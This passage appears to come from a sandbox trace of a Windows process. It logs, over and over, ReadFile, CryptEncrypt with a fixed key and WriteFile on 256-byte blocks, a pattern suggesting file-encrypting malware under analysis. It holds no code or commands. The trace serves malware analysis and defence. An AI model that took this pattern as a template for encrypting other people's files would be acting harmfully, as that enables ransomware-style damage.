lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.751] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.751] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.751] GetLastError () returned 0x0 [0167.751] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.751] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.751] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.751] GetLastError () returned 0x0 [0167.751] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.751] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.751] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.751] GetLastError () returned 0x0 [0167.751] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.751] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.751] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.751] GetLastError () returned 0x0 [0167.751] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.751] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.751] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.751] GetLastError () returned 0x0 [0167.751] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.751] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.751] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.751] GetLastError () returned 0x0 [0167.751] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.751] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.752] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.752] GetLastError () returned 0x0 [0167.752] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.752] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.752] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.752] GetLastError () returned 0x0 [0167.752] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.752] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.752] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.752] GetLastError () returned 0x0 [0167.752] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.752] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.752] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.752] GetLastError () returned 0x0 [0167.752] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.752] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.752] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.752] GetLastError () returned 0x0 [0167.752] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.752] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.752] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.752] GetLastError () returned 0x0 [0167.752] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.752] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.753] GetLastError () returned 0x0 [0167.753] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.753] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.753] GetLastError () returned 0x0 [0167.753] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.753] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.753] GetLastError () returned 0x0 [0167.753] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.753] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.753] GetLastError () returned 0x0 [0167.753] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.753] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.753] GetLastError () returned 0x0 [0167.753] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.753] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.753] GetLastError () returned 0x0 [0167.753] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.753] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.753] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.753] GetLastError () returned 0x0 [0167.753] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.754] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.754] GetLastError () returned 0x0 [0167.754] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.754] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.754] GetLastError () returned 0x0 [0167.754] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.754] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.754] GetLastError () returned 0x0 [0167.754] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.754] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.754] GetLastError () returned 0x0 [0167.754] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.754] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.754] GetLastError () returned 0x0 [0167.754] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.754] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.754] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.754] GetLastError () returned 0x0 [0167.754] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.754] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.755] GetLastError () returned 0x0 [0167.755] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.755] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.755] GetLastError () returned 0x0 [0167.755] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.755] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.755] GetLastError () returned 0x0 [0167.755] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.755] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.755] GetLastError () returned 0x0 [0167.755] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.755] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.755] GetLastError () returned 0x0 [0167.755] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.755] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.755] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.755] GetLastError () returned 0x0 [0167.755] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.755] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.756] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.756] GetLastError () returned 0x0 [0167.756] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, 